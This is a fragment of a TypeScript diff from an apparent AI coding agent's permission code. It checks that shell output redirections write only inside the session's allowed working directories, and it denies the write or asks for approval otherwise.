+ if (isNullRedirectionTarget(redir.target))
1676
+ continue;
1677
+ const { allowed, resolvedPath, decisionReason } = validatePath(redir.target, cwd, toolPermissionContext, 'create');
1678
+ if (!allowed) {
1679
+ const workingDirs = Array.from(allWorkingDirectories(toolPermissionContext));
1680
+ const dirListStr = formatDirectoryList(workingDirs);
1681
+ const message = decisionReason?.type === 'other' ||
1682
+ decisionReason?.type === 'safetyCheck'
1683
+ ? decisionReason.reason
1684
+ : `Output redirection to '${resolvedPath}' was blocked. For security, Thaddeus may only write to files in the allowed working directories for this session: ${dirListStr}.`;
1685
+ if (decisionReason?.type === 'rule') {
1686
+ return {
1687
+ behavior: 'deny',
1688
+ message,
1689
+ decisionReason,
1690
+ };
1691
+ }
1692
+ firstAsk ??= {
1693
+ behavior: 'ask',
1694
+ message,
1695
+ blockedPath: resolvedPath,
1696
+ decisionReason,
1697
+ suggestions: [
1698
+ {
1699
+ type: 'addDirectories',
1700
+ directories: [getDirectoryForPath(resolvedPath)],
1701
+ destination: 'session',
1702
+ },
1703
+ ],
1704
+ };
1705
+ }
1706
+ }
1707
+ }
1708
+ return (firstAsk ?? {
1709
+ behavior: 'passthrough',
1710
+ message: 'All path constraints validated successfully',
1711
+ });
1712
+ }